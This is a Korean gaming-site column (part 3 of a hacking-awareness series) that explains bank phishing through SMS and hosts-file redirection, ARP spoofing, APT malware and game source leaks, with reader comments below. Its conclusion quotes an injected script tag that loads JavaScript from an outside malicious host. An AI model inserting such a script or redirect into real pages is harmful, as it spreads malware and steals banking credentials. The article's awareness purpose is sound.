디스이즈게임
던파한중배너2
당신에게 게임이란 무엇입니까..
게임은 재충전이다
“울프나이츠, 5시간짜리 LOL처럼 즐겨라”
“몰래 내 작품이 수출되는 걸 원치 않는다”
HOME > 연재/카툰 > 연재
2013.03.07 17:45
[니해알] 니들이 해킹을 알어? - 3부

re4lfl0w


 

※ ‘니들이 해킹을 알어?’ 라는 제목에 민감한 반응을 보이시는 분들이 있을 것 같아 미리 밝혀 둡니다. 독자들을 무시하려고 하는 것이 아니라 현재의 문제점을 정확히 보여드리기 위해 약간 민감한 단어를 사용한 것입니다. 다른 뜻은 없으니 독자들의 넓은 마음으로 이해 부탁 드립니다.


 


지난 2부에서 현재 국내를 공격하고 있는 공격자들과 비용대비 효과와 웹 서버 해킹 방법(SQL Injection) 등에 대해서 알아 보았습니다. 이번 글에서는 SQL Injection 공격으로 웹 서버의 권한을 탈취한 후 사용자들에게 어떻게 악성코드를 유포하고 정보들을 악용하는지에 대해서 설명 하겠습니다. 







Figure 1 Know your Enemy - Use 흐름도



 

악성코드들은 기본적으로 백신 탐지를 우회합니다. 백신은 공개되어 있기 때문에 악성코드를 배포하기 전 백신을 우회할 수 있는지 모든 테스트를 합니다.


특히 제로데이는 OS나 네트워크 장비, 애플리케이션 등 핵심 시스템의 보안 취약점이 막을 수 있는 패치가 발표되기도 전에 그 취약점을 이용해 공격을 감행하는 수법으로 가장 강력한 보안 위협입니다.


 

 

 

Figure 2 제로데이 생존일지 





 


 

은행 피싱



첫번째로 은행을 사칭하는 피싱이 있습니다.




 


 




 

요즘 은행을 사칭하여 개인 사용자들의 인터넷 뱅킹 정보를 유출하려는 시도가 많이 포착되고 있습니다. 문자 메시지로 오는 경우가 많으며, 사용자들을 쉽게 속이기 위하여 ‘보안승급’이라는 단어를 사용합니다. 마치 승급을 하지 않으면 피해를 보는 것처럼 속여 피싱 사이트로 접속을 유도합니다.



또 하나의 종류로 hosts 파일을 변조하는 악성코드가 있습니다. 이것은 문자로 오는 것보다 훨씬 위험성이 높습니다. 정상적인 국민은행(www.kbstar.com)으로 접속을 하여도 다른 피싱 사이트(www.kbmtcard.com)로 연결되기 때문입니다.






Figure 4 hosts 파일 변조를 통한 은행 피싱 사이트 접속



 

 

Hosts 파일이란 DNS(Domain Name Service)를 이용하지 않고, 윈도우 OS가 인터넷  DNS보다 hosts 파일을 먼저 참조하는 기능을 이용해서 내부에 설정된 IP주소와 도메인 호스트로 접속하도록 설정하는 파일입니다.


쉽게 이야기해서 Hosts 파일에 정상적인 국민은행 사이트(www.kbstar.com)를 (www.kbmtcard.com)으로 변경한다면 국민은행으로 정상적인 접속을 하여도 공격자가 변경한 피싱 사이트인 www.kbmtcard.com 으로 접속하게 됩니다.



이런 hosts 파일 변조가 무서운 것은 사용자가 아무리 정상적인 국민은행 사이트로 접속을 하여도 hosts 파일 변조에 의해 피싱 사이트로 접속하기 때문입니다.






 




  

Figure 5 실제 은행 피싱 피해 사례 - 1





보시는 것과 같이 정상적인 국민은행 사이트(왼쪽)와 피싱사이트(오른쪽)이 거의 유사합니다. 이런 피싱들을 염두에 두지 않는다면 인터넷뱅킹 정보가 유출될 가능성도 있습니다. 





 



Figure 6 정상 국민은행(왼쪽)과 피싱(오른쪽) 사이트

 





 

ARP Spoofing



두번째로 주소결정프로토콜(ARP, Address Revolution Protocol) Spoofing을 사용하여 같은 네트워크에 있는 사람들의 정보까지 탈취하는 방법입니다.





Figure 7 ARP Spoofing 흐름도



ARP Spoofing이란 자신을 감추고 신뢰성 있는 사람으로 변장하는 것을 의미합니다. 즉, Billy Bob과 Peggy Sue가 서로 연애 편지를 주고 받는데 공격자가 Arp Spoofing으로 연애 편지를 엿볼 수 있다는 뜻입니다. 또한 엿보는 것을 넘어서 연애 편지를 조작해서 보낼 수도 있습니다. 

그렇게 된다면 Billy Bob과 Peggy Sue는 원래 사랑하던 사이였는데 조작된 연애 편지 때문에 헤어질 수도 있는 것입니다.




 


Figure 8 모 IT회사의 개발자망 차단 내역




 

이것은 모 IT 기업 개발사 내부망 장비 차단 결과입니다. 이 결과에서 보여지듯이 2주간 발생한 데이터입니다. 내부망의 사용자 PC가 단 한대라도 권한 획득을 당했을 경우 대단히 위험합니다. APT 공격이 시작 되는 것입니다.



APT란 Advanced Persistent Threat는 공격 상대를 연구한 뒤 지능적으로 접근하는 해킹 방식입니다. 예전에는 백도어라는 통칭으로 많이 쓰이던 부류들인데 갑자기 APT로 변경이 되었습니다. 기본적으로 백신을 우회할 수 있다면 APT라고 불러도 손색이 없습니다. 백신으로 막을 수 없는 위협들을 책임을 회피하기 위해 APT라는 용어를 만들었다는 보안 업계의 전문가 의견도 있었습니다.



단 2주간의 개발자망 차단 내역인데도 불구하고 APT 관련된 공격이 11건(8번)이나 있었습니다. 이 개발자망의 개발 소스는 안전할까요? 한 번 진지하게 고민해봐야 할 시점입니다.



프리서버가 활개치는 것은 무엇을 의미할까요? 혹시 게임 소스가 유출된 것은 아닐까요? 게임 개발 소스는 해당 게임의 모든 내역들이 들어있는 보물지도와도 같은 것입니다. 이것만 있다면 똑같은 게임을 그대로 만들 수가 있습니다. 현재 APT 유형의 악성코드가 국내에 대규모로 유포되고 있습니다. 공격자들은 개발자망 PC중에 단 한 대만 감염이 되어도 ARP Spoofing으로 같은 내부망에 있는 게임 서버에 접속하여 게임 개발소스를 유출할 수 있습니다.




 







 

결론



빛스캔, KAIST 사이버보안연구센터, 정보보호대학원이 공동으로 밝힌 9월 4주차 국내 보안 위협 분석 보고서에 따르면 9월 3주차에 이어 금주에도 PC에 설치되는 최종 악성코드 기능에 ARP 스푸핑 기능을 통한 웹페이지 변조 후 <script language=JavaScript src=http://ewy.passinggas.net/tj.js><script>를 삽입하는 형태가 발견 되었습니다. 




 





 

이것은 바로 현재 실제로 일어나는 일입니다. 과거도 아니며 미래도 아닙니다. 바로 지금 국내에서 일어나고 있는 현실입니다. 



본 기획기사는 3부, Know your Enemy - Tech(공격자들이 웹 소스에 각종 장비를 회피하기 위하여 어떤 방법으로 악성링크를 삽입했는지)에 대한 주제로 이어집니다.


 

 

 




(c)디스이즈게임닷컴(www.thisisgame.com), 무단 전재(펌) 및 재배포 금지



주소 : http://www.thisisgame.com/board/view.php?id=1469779&category=4001  

re4lfl0w
온라인 게임을 즐기다 어느 순간 계정탈취를 당하여 모든 아이템이 없어졌습니다.
게임사에게 받은 답장은 안타깝지만 복구해 줄 수 없다는 내용이었습니다.
하도 답답하여 게임 커뮤니티에 질문을 하였으나 그 어느곳도 제가 어떻게 해킹을 당했는지 알려주지 않았습니다.
그 당시 잠도 줄여가며 모은 아이템들이 순식간에 없어지게 되니 미치겠더군요..
그때부터 한 가지 생각을 하게 됐습니다.
&acute;내가 어떻게 해킹을 당했는가?&acute; 그 원인을 분석하여 보자. 라는 생각으로 지금까지 오게 됐습니다.
제가 가졌던 의문의 답을 어느 정도 할 수 있게 됐고 계정탈취를 당해서 아이템이 없어졌을 때의 마음을 알기에 그 정보들을 유저분들에게 공개하겠습니다.

- 前 게임 매니아
- 現 보안업체 빛스캔 근무
 
*이 게시물에 대한 여러분의 의견은 3 7 0

문제가 있다 판단되는 글과 댓글은 '신고하기'를 이용해 주세요!
인터넷상의 글은 스스로를 비추는 거울과 같습니다. 글을 남기기 전에 한 번 더 생각해 주는 센스~!! 지나친 비방, 인신공격, 욕설 및 네티켓에 어긋나는 내용, 광고, 도배는 통보없이 삭제됩니다.

졸가메 2013.03.07 17:55     0 

좋은 시리즈 감사합니다. 잘봤습니다.

HanSia 2013.03.07 20:42     0 

잘 봤습니다 !!

Rosa 2013.03.09 11:01     0 

요새 확실히 파밍 경고는 자주 나와서 익숙해진듯해요

장판교 2013.03.09 11:05     0 

으허허헉 유익해보이지만 이해가 안간다 !ㅜ

조루리 2013.03.09 11:09     0 

파밍이 어떤식으로 이뤄지는지는 처음알았네요 항상 파밍파밍 이야기는 많이 들었지만 ;

쪼리 2013.03.09 18:02     0 

어휴 정말 피싱사기 요새 너무 심해짐 ㄱ-

별을쏘다 2013.03.10 11:16     0 

결국 프리서버도 개발자가 직접유출시켰기보다는 PC가 감염되어 유출된거군요

DV 2013.03.10 14:15     0 

내용이 어렵지만..

그래도 좋은 이야기 감사합니다.

와일드보어 2013.03.16 23:17     0 

블소 프리섭도 있구나 ㄷㄷㄷ;;; 대단하다

건담의제왕123 2013.03.24 13:00     0 

너무 어렵다....

    (좋은 글에는 엄지를!)
/ 600 Byte
[8주년] TIG 기자들이 뽑은 최고의 기사 [190] ( 03 . 14 )
SD건담, 시난주 오리지널 시난주 스타인 출격 [1] ( 05 . 22 )
[즐코스] 팬티&스타킹의 ‘팬티’ 경찰복 버전 [34] ( 05 . 22 )
[주간 스마트] 팬더 비행단, 날아오르다 [4] ( 05 . 20 )
[즐코스] 사이퍼즈 식물 능력자 ‘드루이드 미아’.. [19] ( 05 . 18 )
[주간스마트] 한글로 즐기는 유료게임 급상승! [2] ( 05 . 13 )
[TIG스토리] 게임업계 직장인 밴드 공연하던 날 [9] ( 05 . 10 )
[오늘의모바일] 좀비 밭? 음산한 분위기가 일품! [5] ( 05 . 08 )
[주간스마트] 슈퍼 히어로, 모바일에서 맹활약! [4] ( 05 . 06 )
[오늘의모바일] 영화 공식 모바일게임! 아이언맨 3 [6] ( 05 . 03 )
[즐코스] 얼쑤~! 리그오브레전드 ‘신바람 탈 샤코’.. [15] ( 05 . 02 )
[주간스마트] 런게임 강세! 쿠키런 3주 연속 1위 [5] ( 04 . 29 )
[오늘의모바일] 뿌요뿌요와 카드수집의 만남 [11] ( 04 . 29 )
[오늘의모바일] 물고기를 튕겨라! 피쉬 아웃 오브 워터.. [1] ( 04 . 29 )
[주간스마트] 쿠키런 연속 1위! 마구마구 급상승 [3] ( 04 . 22 )
[오늘의모바일] 친구와 팀을 이루는 비행슈팅! [6] ( 04 . 19 )
SD건담, 궁극의 풀아머 백식 개량형 출격! [1] ( 04 . 17 )
[오늘의 모바일] 피하기만 하면 되는 탱크슈팅! [7] ( 04 . 16 )
[주간스마트] 쿠키런, 애플·구글에서 1위 질주! [6] ( 04 . 15 )
[오늘의모바일] PC온라인 그대로! 마구마구2013 [12] ( 04 . 15 )
 1 2 3 4 5 6 7 8 9 10 

TIG 마켓

[주간스마트] 쿠키런 연속 1위! 마구마구 급상..
SD건담, 궁극의 풀아머 백식 개량형 출격!..
[오늘의모바일] 친구와 팀을 이루는 비행슈팅!..
와우만화 - 챕터4 13 ~ 17
[오늘의 모바일] 피하기만 하면 되는 탱크슈팅!..
[오늘의모바일] 물고기를 튕겨라! 피쉬 아웃 오브 ..
[슭의 말년휴가] 어드바이스
[슭의 말년휴가] 후임관리
[슭의 말년휴가] 허브작업(1)
[슭의 말년휴가] 첫 외박(2)
[슭의 말년휴가] 게임
[슭의 말년휴가] 일병진급
[크리티카] 쏟아지는 탄막! 드로이드..
한국게임산업협회, 지스타 2013 다시..
‘게임회사에서 예술하기’ NDC 2013..
리니지, PC방 전용 이벤트 사냥터 공..
“아키에이지로 돌아와서 다시 판단..
“도타2 한국어 더빙, 농담과 신음소..
[허접칼럼] 게임을 게임이라고 부르..
마영전 디렉터 신작 프로젝트K, 넥슨..
(영상) 전면 리뉴얼! 한게임 테트리..
‘넥슨의 한 주’ 워페이스 오픈과 N..
사이트맵       TIG소개       이용약관       개인정보취급방침       광고/제휴문의       제보하기       FAQ       질문/건의       RSS
등록번호 : 서울 아 00368  등록일자 : 2007년 5월 4일  발행인 : 임상훈  편집인 : 이재진  주소 : 서울 강남구 대치동 907-7번지 성진빌딩 5층
디스이즈게임닷컴의 모든 콘텐츠는 저작권법의 보호를 받으며, 무단 전재, 복사, 배포를 금합니다.편집 2013.05.25 (토)
Copyright (c) ThisisGame.com. All rights reserved.